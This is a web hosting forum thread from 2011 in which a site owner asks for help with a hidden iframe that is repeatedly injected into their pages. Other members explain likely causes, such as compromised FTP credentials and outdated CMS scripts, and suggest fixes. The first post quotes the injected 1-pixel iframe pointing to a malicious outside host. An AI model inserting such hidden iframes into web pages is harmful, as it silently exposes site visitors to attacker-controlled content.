hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : Virus Attack - Website Blocked!
Reply

Forum Jump

Virus Attack - Website Blocked!

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 01-01-2011, 02:24 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25

Virus Attack - Website Blocked!


Hello, Google tells us following code in our every page. We have tried to remove this code but this is added automatically within seconds. Google has also blocked our main website temporary for public.

Please advise,

--
Code:
--
<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>


Last edited by AJKservers; 01-01-2011 at 02:27 AM.
Reply With Quote


Sponsored Links
  #2  
Old 01-01-2011, 02:26 AM
Steven Steven is offline
Problem Solver
 
Join Date: Mar 2003
Location: California USA
Posts: 13,073
Is this a shared hosting account? if so contact your host

If it is a a dedicated server or vps, then you have some malicious activity going on with the server and it needs to be investigated. It could be happening through a backdoor, php shell, or even through ftp.

Can you give us more information please?

__________________
Steven Ciaburri | Proactive Linux Server Management - Rack911.com
System Administration Extraordinaire | Follow us on twitter:@Rack911Labs
Managed Servers (AS62710), Server Management, and Security Auditing.
www.HostingSecList.com - Security notices for the hosting community.

Reply With Quote
  #3  
Old 01-01-2011, 02:30 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25
Quote:
Originally Posted by Steven View Post
Is this a shared hosting account? if so contact your host

If it is a a dedicated server or vps, then you have some malicious activity going on with the server and it needs to be investigated. It could be happening through a backdoor, php shell, or even through ftp.

Can you give us more information please?
There are many of our websites running on the same server. It's a dedicated server running cPanel/WHM. ONLY, our main website is affected http://www.AJKservers.co.uk

I do not have any more information at the moment as we just noticed this activity and posted here for comments and advices to prevent from this kind of activities. I would need to find the source of this code, but I don't know where to start


Last edited by AJKservers; 01-01-2011 at 02:36 AM.
Reply With Quote
Sponsored Links
  #4  
Old 01-01-2011, 03:54 AM
steven_elvisda steven_elvisda is offline
Junior Guru
 
Join Date: Jun 2009
Posts: 191
Hello AJKservers,

I think that check your code again. because of your computer infected by virus and it infected to your html file.

please try.

Reply With Quote
  #5  
Old 01-01-2011, 05:32 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25
Quote:
Originally Posted by steven_elvisda View Post
Hello AJKservers,

I think that check your code again. because of your computer infected by virus and it infected to your html file.

please try.
You're right, but I have already re-installed OS, updating windows, windows defender and other anti applications. Trying to remove code from ever page again, and I hope, it won't happen again.

Thank for your comments guys.

Reply With Quote
  #6  
Old 01-01-2011, 08:54 AM
madaboutlinux madaboutlinux is offline
Web Hosting Master
 
Join Date: Jul 2009
Posts: 1,543
Quote:
Originally Posted by AJKservers View Post
You're right, but I have already re-installed OS
Re-installed OS of your server OR local machine? Such injections are performed via Ftp OR a compromised script on your server. Re-installing the server OS and removing 'iframe' code won't make any difference if the compromised script is still under your account.

If the injection is performed by hacking the Ftp password, re-installing your local machine would sort out the things for you. For now. But make sure you install a firewall and limit ftp access to your own IPs so such issues can be minimized.

__________________
| LinuxHostingSupport.net
| Server Setup | Security | Optimization | Troubleshooting | Server Migration
| Monthly and Task basis services.
| MSN : madaboutlinux[at]hotmail.com | Skype : madaboutlinux

Reply With Quote
  #7  
Old 01-01-2011, 11:59 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25
Quote:
Originally Posted by madaboutlinux View Post
Re-installed OS of your server OR local machine? Such injections are performed via Ftp OR a compromised script on your server. Re-installing the server OS and removing 'iframe' code won't make any difference if the compromised script is still under your account.

If the injection is performed by hacking the Ftp password, re-installing your local machine would sort out the things for you. For now. But make sure you install a firewall and limit ftp access to your own IPs so such issues can be minimized.
Actually, the website was infected from our own local computer via FTP. There was no third party involved. However, the management of the server has also been notified at the time to take further security measures.

Anyways, I appreciate your response to this thread, madaboutlinux.

Reply With Quote
  #8  
Old 01-02-2011, 10:02 PM
onnoysomoy onnoysomoy is offline
Junior Guru Wannabe
 
Join Date: Sep 2010
Location: Bangladesh
Posts: 84
This is happening when someone use any nulled version of scripts.

__________________
Shared Hosting by Hosting Divine
Fast, Affordable & Reliable Web Hosting
24/7 365 Support, 99.99% Network Up-time Guarantee

Reply With Quote
  #9  
Old 01-02-2011, 10:59 PM
KMyers KMyers is offline
Technical Nutcase
 
Join Date: Mar 2009
Location: Miami, Florida
Posts: 18,619
Quote:
Originally Posted by onnoysomoy View Post
This is happening when someone use any nulled version of scripts.
Hello,
Actually this happens more with people using outdated scripts with known exploits (PSA for those who are using a 3 year old version of WordPress or Joomla ). Nulled scripts are more notorious for Data Leaks or Backdoors.

__________________
Keith M.- CTO
VPS | Cloud Resource Pools | Dedicated Servers | Colocation
99.999% Uptime | 24x7x365 Support | onApp Powered Cloud | Global Data Centers
Big Brain Global Networks | A Division of Big Brain, LLC

Reply With Quote
  #10  
Old 01-03-2011, 12:13 AM
mugo mugo is offline
Intangible Asset Appraiser
 
Join Date: Mar 2009
Location: Austin Tx
Posts: 1,973
The most usual attack is from sniffed FTP passwords in this form of iframe attack.
First off, either your machine is being sniffed, or someone allowed an insecure script that let in someone to run a plain text sniffer.

At the least, you will need to change the ftp passes, but after you are sure the sniffer is gone, or do it locally if you are sure it's network based.
Better, switch from the insecure ftp to at least sftp that can be encrypted, and not sniffed.

I've seen, literally, about 20 different ways the ftp password was compromised...weak passes (bruteforce attacks), sniffers, compromised configs (containing passes), "notes" left in bad places...

Most of these are hacked either with close-network password sniffs, or a bad script on someones web site that allowed an upload and execution of a local sniffer (usually an old or mis-configed Wordpress or Joomla, as KDisk said), but probably 95% chance this has to do with a compromised FTP password.

__________________
This is the best signature in the world....Tribute!
(It is not the best signature in the world, no. This is just a tribute)


Reply With Quote
  #11  
Old 01-03-2011, 12:40 AM
steven_elvisda steven_elvisda is offline
Junior Guru
 
Join Date: Jun 2009
Posts: 191
Quote:
Originally Posted by KDisk View Post
Hello,
Actually this happens more with people using outdated scripts with known exploits (PSA for those who are using a 3 year old version of WordPress or Joomla ). Nulled scripts are more notorious for Data Leaks or Backdoors.
Hello AJKservers,

I agree with these ideas. Please check your cms component or check your code especially your javascript code. Sometime you copy some verify code of jquery or ajax it will harmful your website. one other thing, I suggest you to use protocol FTPES on your filezilla ftp client to upload your file.

Reply With Quote
  #12  
Old 01-03-2011, 04:52 AM
AJKservers AJKservers is offline
Disabled
 
Join Date: Sep 2010
Posts: 25
We never used nulled scripts, softwares on our local computers were outdated, windows defender and antivirus softwares were also outdated.

Thank you guys for your comments and suggestions. We have updated all scripts, including CMS, forums etc etc , secured local computer, secured sever, changed passwords, and removed iframe from pages.

Google has also unblocked our website within 3 hours of doing all things. It's now over 35 hours and everything is going good.

Reply With Quote
Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
Phishing Attack: Site now blocked by D-Link Routers Exitof99 Hosting Security and Technology 7 09-30-2010 10:22 AM
HTML Frammer Virus Attack On Website : Please Help techbongo Hosting Security and Technology 5 06-11-2009 02:45 PM
possible attack or virus? torwill Hosting Security and Technology 3 07-07-2004 01:41 AM
Massive Virus Attack Artashes Web Hosting 18 04-12-2003 01:50 PM
Virus Attack?? VetteMan Hosting Security and Technology 0 04-28-2001 03:45 AM

Related posts from TheWhir.com
Title Type Date Posted
GCHQ, Not NSA, Behind Belgian Telecom Attack: Report Web Hosting News 2014-05-01 08:22:23
OpenDNS Releases Umbrella Web Security Platform with Predictive Detection Web Hosting News 2013-08-12 11:25:29
FireHost Report Shows Cybercriminals Are Using the Cloud to Deploy Attacks Web Hosting News 2013-07-30 11:58:07
FireHost Report Shows Cross-Site Scripting Attacks Up 160 Percent from Q3 Web Hosting News 2013-01-30 14:43:57
FireHost Report Finds Cross-Site Attacks Trump SQL Injections in Q3 2012 Web Hosting News 2012-10-23 09:18:51


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?